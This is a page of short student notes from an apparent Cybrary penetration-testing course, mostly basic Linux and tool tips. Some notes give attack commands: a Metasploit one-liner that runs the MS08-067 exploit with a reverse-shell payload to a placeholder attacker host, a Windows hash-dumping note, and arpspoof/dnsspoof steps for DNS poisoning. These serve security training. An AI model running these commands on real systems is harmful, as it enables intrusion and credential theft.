Advanced Penetration Testing Notes

Burp suite

Traget –> site map ->right click ->spider [view]

By: sau206 | Related Lesson: WebApp (part 2) Vulnerable Web Applications | Modified: December 24, 2016

passwords

hashdump # interpret command to save hashes bkhive system (name) #opens key on system files   [view]

By: lmakonem | Related Lesson: Passwords (part 1) Password Attacks | Modified: December 23, 2016

Common commands

Sudo -i Adduser cd /root pwd (print working dir) mkdir <dir> make directory touch <name> create file cp copy file mv MOVE cat , like read file echo hi >>myfile (ADD to fle) nano <filename> read in text editor   [view]

By: glitchstream | Related Lesson: Linux (part 3) - Directories, myfile and Nano | Modified: December 23, 2016

Msfcli No Longer Exists

That’s the new way of exploiting in a single line: msfconsole -x ”use exploit/windows/smb/ms08_067_netapi; set RHOST target_ip; set PAYLOAD windows/shell/reverse_tcp; set LHOST attacker_ip; set LPORT listening_port; exploit”   [view]

By: Abner Freitas | Related Lesson: Metasploit (part 5) msfcli | Modified: December 22, 2016

kali

 kali linux [view]

By: nemsiz | Related Lesson: Linux (part 1) | Modified: December 21, 2016

chmod manipulation

chmod <perm> <fileName> ls <-l> – listing {perms : 705 , +x[execute perms for everybody],} grep <alpha> cut -d ” ” -f <num> sort -u apt-get install <fileName> [view]

By: SACHU | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: December 21, 2016

Hacking Prevention

 Hacking :Greetings from Student: Isaiah O Reid, i’m so grateful to be a part of this online learning course from Cybrary, it’s good to be trained on how to protect ourselves from cyber hacking. Isaiah O. Reid Forensic Science /Criminal [view]

By: Isaiah | Related Lesson: Passwords (part 2) Online Password Cracking | Modified: December 20, 2016

jj

jj [view]

By: Dos | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: December 20, 2016

Metalspoit

www.exploit-db.com [view]

By: donafcna | Related Lesson: Metasploit (part 2) Fundamentals | Modified: December 19, 2016

DNS Cache Poisoning

Restart arpsoofing between gateway and target dnsspoof -i eth0 -f hosts.txt [view]

By: Butterblob | Related Lesson: Traffic Capture (part 4) DNS | Modified: December 19, 2016

« First ‹ Previous 1 97 187 195 196 197 198 199 207 243 Next › Last »

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 870 / December 14, 2019
How do I Get MTA Certified?
Views: 1424 / December 12, 2019
How much does your PAM software really cost?
Views: 1861 / December 10, 2019
How Do I Get into Android Development?
Views: 2250 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel